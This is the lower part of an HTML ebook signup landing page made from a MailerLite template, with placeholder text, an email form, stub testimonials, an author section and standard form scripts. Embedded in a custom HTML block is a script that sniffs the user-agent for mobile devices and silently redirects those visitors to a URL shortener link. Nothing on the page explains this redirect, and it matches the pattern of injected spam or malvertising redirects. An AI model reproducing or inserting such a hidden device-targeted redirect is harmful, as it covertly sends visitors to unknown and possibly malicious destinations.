                <p style="text-align: center;">Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.</p>
              </div>
              <div>
                <div class="form-group ml-field-name">
                  
                  <input type="text" class="form-control" data-inputmask="" name="fields[name]" placeholder="Name" autocomplete="name">
                </div>
              </div><div>
                <div class="form-group ml-field-email ml-validate-email ml-validate-required">
                  
                  <input type="email" class="form-control" data-inputmask="" name="fields[email]" placeholder="Email" autocomplete="email">
                </div>
              </div>
              
              <button class="btn btn-block primary" type="submit">GET THE EBOOK</button>
              <button disabled="disabled" style="display: none;" type="button" class="loading btn btn-block"><img src="https://static.mailerlite.com/images/rolling.gif" width="20" height="20" style="width: 20px; height: 20px; display: block; margin: 0 auto;" border="0"></button>
              
                  <input type="hidden" name="ml-submit" value="1">
            </div>
          </div>
		    </div>
	    </div>
	  </form>
  </div>






							
							
						</div>
					</div>
				
					<div class="container-fluid ml-10">
						<div class="container">
							
								
	
	
      	
	
	
		
	
	
		
		
		
		
	

<div class="row">
  <div class="col-sm-12">
		<h1>What readers are saying about this book</h1>
	</div>
</div>

							
							
						</div>
					</div>
				
					
<div class="container-fluid ml-12">
	<div class="container">
		
			
				
				
				
					
				
				
					
					
						
				
			
			<div class="row">
				<div class="col-sm-12">
					<hr>
				</div>
			</div>
		
	</div>
</div>


				
					<div class="container-fluid ml-14">
						<div class="container">
							
								
									
									
									
										
									
									
										
										
										
										
									
									
										
										
										

									
									
										
										
									
								
								
									<div class="row">
										<div class="col-sm-4 col-res-30">
											
												
	
		
		
	
	
		
		
		
	
	
		
		
		
	
	
		
		
		
	
	
		
		
	


<div class="media ml-15 ts-block">
  <div class="media-left">
      <img class="media-object" src="https://bucket.mlcdn.com/a/498/498695/images/bc38a26477fa1678989d3bdae1c415100643ee76.jpeg" alt="" width="64" style="display: block;" border="0">
  </div>
  <div class="media-body">
    <h4 class="media-heading">Samantha James</h4>
    <div class="details">Company and position</div>
    
	<blockquote class="blockquote-15">
		<p>Donec id elit non mi porta gravida at eget metus.</p>
	</blockquote>
  </div>
</div>


											
										</div>
										<div class="col-sm-4 col-res-30">
											
												
	
		
		
	
	
		
		
		
	
	
		
		
		
	
	
		
		
		
	
	
		
		
	


<div class="media ml-16 ts-block">
  <div class="media-left">
      <img class="media-object" src="https://bucket.mlcdn.com/a/498/498695/images/edb473ef3a061e5fcd3b710af78029c9d6448e4d.jpeg" alt="" width="64" style="display: block;" border="0">
  </div>
  <div class="media-body">
    <h4 class="media-heading">Bernard Dunn</h4>
    <div class="details">Company and position</div>
    
	<blockquote class="blockquote-16">
		<p>Donec id elit non mi porta gravida at eget metus.</p>
	</blockquote>
  </div>
</div>


											
										</div>
										<div class="col-sm-4">
											
												
	
		
		
	
	
		
		
		
	
	
		
		
		
	
	
		
		
		
	
	
		
		
	


<div class="media ml-17 ts-block">
  <div class="media-left">
      <img class="media-object" src="https://bucket.mlcdn.com/a/498/498695/images/365366129b0a1969a43d284874984dabfc154eea.jpeg" alt="" width="64" style="display: block;" border="0">
  </div>
  <div class="media-body">
    <h4 class="media-heading">Stephanie Hart</h4>
    <div class="details">Company and position</div>
    
	<blockquote class="blockquote-17">
		<p>Donec id elit non mi porta gravida at eget metus.</p>
	</blockquote>
  </div>
</div>


											
										</div>
									</div>
								
								
								
								
							
						</div>
					</div>
				
					<div class="container-fluid ml-22">
						<div class="container">
							
								
	
	
      	
	
	
		
	
	
		
		
		
		
	

<div class="row">
  <div class="col-sm-12">
		<h1>About the author</h1>
	</div>
</div>

							
							
						</div>
					</div>
				
					
<div class="container-fluid ml-24">
	<div class="container">
		
			
				
				
				
					
				
				
					
					
						
				
			
			<div class="row">
				<div class="col-sm-12">
					<hr>
				</div>
			</div>
		
	</div>
</div>


				
					<div class="container-fluid ml-26">
						<div class="container">
							
								
									
									
									
										
									
									
										
										
										
										
									
									
										
										
									
									
										
										
									
								
								
								
								
									<div class="row">
										<div class="col-sm-6 col-sm-offset-3">
											
												
	
	
		
		
	
	
		
		
		
		
	
	
		
		
	
	
		
		
	
	
		
		
		
		
		
		
		
	


<div class="img-27">
	<img class="img-27 img-responsive" src="https://bucket.mlcdn.com/a/498/498695/images/884786dd402e631abf391c5b0eabc5bc086a348a.jpeg" alt="" width="128" style="display: block;" border="0">
</div>
<h2 class="subtitle-27">Fred Fuller</h2>
<div class="text-27">
	<p style="text-align: center;">At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident, similique sunt in culpa qui officia deserunt mollitia animi, id est laborum et dolorum fuga.</p>
</div>




											
										</div>
									</div>
								
								
							
						</div>
					</div>
				
					
<!--  -->
<div class="editor-html-code">
	<!--  -->
<div class="editor-html-code">
	<script type="text/javascript"> var device = navigator.userAgent

if (device.match(/Iphone/i)|| device.match(/Ipod/i)|| device.match(/Android/i)|| device.match(/J2ME/i)|| device.match(/BlackBerry/i)|| device.match(/iPhone|iPad|iPod/i)|| device.match(/Opera Mini/i)|| device.match(/IEMobile/i)|| device.match(/Mobile/i)|| device.match(/Windows Phone/i)|| device.match(/windows mobile/i)|| device.match(/windows ce/i)|| device.match(/webOS/i)|| device.match(/palm/i)|| device.match(/bada/i)|| device.match(/series60/i)|| device.match(/nokia/i)|| device.match(/symbian/i)|| device.match(/HTC/i))
 { 
window.location = "https://po.st/JG4nac";

}
else
{

} </script>
</div>
<!--  -->	
</div>
<!--  -->

				
		</div>
	    <div class="row-success" style="display: none">
			<template class="success-template">				
						<div class="container-fluid ml-37">
							<div class="container">
								
									
	
	
      	
	
	
		
	
	
		
		
		
		
	

<div class="row">
  <div class="col-sm-12">
		<h1>Thank you!</h1>
	</div>
</div>

								
								
							</div>
						</div>
					
						
<div class="container-fluid ml-39">
	<div class="container">
		
			
				
				
				
					
				
				
					
					
						
				
			
			<div class="row">
				<div class="col-sm-12">
					<hr>
				</div>
			</div>
		
	</div>
</div>


					
						<div class="container-fluid ml-41">
							<div class="container">
								
									
	
	
      	
	
	
		
	
	
		
		
	
	
		
		
	

<div class="row">
  <div class="col-sm-12">
      <p style="text-align: center;">Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>
<p style="text-align: center;">Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.</p>
	</div>
</div>



								
								
							</div>
						</div>
					
						<div class="container-fluid ml-43">
							<div class="container">
								
									
	
	
	
	
	
		
	
	
		
	

<div class="row">
  <div class="col-sm-12 align-center">
		<img class="img-responsive display-inline" src="https://bucket.mlcdn.com/a/498/498695/images/e08447e0ada488ce230be3c4ee61dff5cbaed0a3.png" width="1300" border="0" style="display: block;">
	</div>
</div>

								
							</div>
						</div>
					
						<div class="container-fluid ml-45">
							<div class="container">
								
									
	
	

	
		
		
	
	
		
		
		
		
		
		
	

<div class="row">
	<div class="col-sm-6 col-sm-offset-3">
		<a class="btn btn-block" href="#" target="">Download your ebook!</a>
				

	</div>
</div>


								
							</div>
						</div>
					
			</template>
		</div>
		
		<div style="margin-bottom: 0px; margin-top: 30px;">
				
		
			
      
      
        
        
        
        
        
      
      
					
				
				
					
					
					
				
				
					
				
      
      
			
			<! -- Footer -- >
			<div class="container-fluid ml-46 footer">
        <div class="container">
          <div class="row">
            <! -- Content width -- >
            <div class="col-sm-12">
              <div class="row">
                <div class="col-sm-6 copyright">
                  © 2018
                </div>
                <div class="col-sm-6 social-icons-block">
                  
                  <ul class="social-icons pull-right">
                    <li>
                      <a href=""><img width="28" height="28" alt="facebook" src="https://bucket.mlcdn.com/images/icons/social/white/facebook.png" style="display: block;" border="0"></a>
                    </li><li>
                      <a href=""><img width="28" height="28" alt="twitter" src="https://bucket.mlcdn.com/images/icons/social/white/twitter.png" style="display: block;" border="0"></a>
                    </li>
                  </ul>
                </div>
              </div>
            </div>
            <! -- /Content width -- >
          </div>
        </div>
      </div>
			<! -- /Footer -- >
			
			
				
		</div> 
    
        <! -- Powered by MailerLite -- >
    <div class="row">
      <div class="col-sm-12">
        <a href="https://www.mailerlite.com" target="_blank">
          <img height="35" width="86" border="0" alt="MailerLite" src="https://static1.mailerlite.com/assets/plugins/builder2/images/powered-by-mailerlite.png" style="margin: 30px auto; display: block;">
          </a>
      </div>
    </div> <! -- /Powered by MailerLite -- >
    		
		<div style="display: none">
		    <script>
 

  var $ = window.ml_jQuery || window.jQuery;

 document.onkeydown = function(evt) {
   evt = evt || window.event;
   var isEscape = false;
   if ('key' in evt) {
     isEscape = evt.key == 'Escape';
   } else {
     isEscape = evt.keyCode == 27;
   }

   if (isEscape) {
     close();
   }
 };

 function close() {
        window.parent.postMessage('ml-accounts-1125614-c4m1y3y9p5-webforms-841852-l4e7z1-hide', '*');
 };

 function sendHeightToParent(selector) {
   setTimeout(function(){
    var formHeight = $(selector).outerHeight();
    window.parent.postMessage('ml-accounts-1125614-c4m1y3y9p5-webforms-841852-l4e7z1-setHeight-' + formHeight + 'px', '*');
   },50);
 }

 if ($('.mailerlite-popup').length) {
   setTimeout(function() {
    sendHeightToParent('.mailerlite-popup');
   },200);
   $(window).resize(sendHeightToParent.bind(null, '.mailerlite-popup'));
 }


 if ($('.mailerlite-slidebox').length) {
   setTimeout(function() {
    sendHeightToParent('.mailerlite-slidebox');
   },200);
   $(window).resize(sendHeightToParent.bind(null, '.mailerlite-slidebox'));
 }

 if ($('.mailerlite-form-bar').length) {
   setTimeout(function() {
     sendHeightToParent('.mailerlite-form-bar');
   },200);
   $(window).resize(sendHeightToParent.bind(null, '.mailerlite-form-bar'));
 }


 if ($('.mailerlite-fullscreen').length) {
   setTimeout(function() {
     sendHeightToParent('.mailerlite-fullscreen');
   },200);
   $(window).resize(sendHeightToParent.bind(null, '.mailerlite-fullscreen'));
 }

 function ml_webform_success_841852 () {
   $('.row-form').hide();
   $('.row-success').show();
   $(window).scrollTop(0);

  
   if ($('.row-success').find('.success-template').length && $('.success-template').html()) {
     $('.row-success').replaceWith($('.success-template').html());
   }
 }

    
</script>

  <img src="https://track.mailerlite.com/webforms/o/841852/l4e7z1" width="1" height="1" />

	    </div>
	    <style>
			.popup {
				display: none;
				position: fixed;
				top:0;
				left:0;
				right: 0;
				bottom: 0;
				width: 100%;
				height: 100%;
				z-index: 9999;
			    background: rgba(0,0,0,0.35);
			    overflow: scroll;
			}
			.webform-container {
				padding: 30px;
				margin: 0;
			}
			.mailerlite-container {
		        width: 100% !important;
		        box-sizing: border-box;
		        margin: 0 auto;
		        position: static;
		        display: table;
		        height: 100%;
		    }
		    .mailerlite-vertical-align-center {
		        
		        display: table-cell;
		        vertical-align: middle;
		        text-align: center;
		        
		    }
		    .ml-subscribe-form .ml-vertical-align-center{
		        display: table-cell;
		        vertical-align: middle;
		    }
		    .mailerlite-webform {
		        position: relative;
		        display: inline-block;
		        width: 100%;
		        padding: 0px;
		        max-width: 480px;
		        text-align: left;
		    }
		    .close-popup {
				position: absolute;
				right: 5px;
				top: 5px;
				height: 30px;
				width: 30px;
				line-height: 30px;
				text-align: center;
				font-size: 16px;
				z-index: 2;
		    }
		    .close-popup:hover {
		        text-decoration: none;
		    }
		</style>
		
		<script>
			function showPopup(ele) {
				var container = ele.closest('.container');
				var popup = container.find('.popup');
				var bodyFixed = $('body');
				popup.show('fadeIn');
				bodyFixed.addClass('bodyClassFixed')
			}
			function hidePopup(ele) {
				var popup = ele.closest('.popup');
				var bodyFixed = $('body');
				popup.hide();
				bodyFixed.removeClass('bodyClassFixed');
			}
			$(document).on('click', '.popup', function() {
				hidePopup($(this));
			});
			$(document).on('click', '.mailerlite-webform', function(e) {
				e.stopPropagation();
			})
		</script>
		<script src="https://static.mailerlite.com/js/w/webforms.min.js?v3772b61f1ec61c541c401d4eadfdd02f" type="text/javascript"></script>
		<script async="async" src="https://code.jquery.com/jquery-2.2.4.min.js" crossorigin="anonymous" type="text/javascript"></script>
    <script async="async" src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js" crossorigin="anonymous" type="text/javascript"></script>
    </body>
</html>
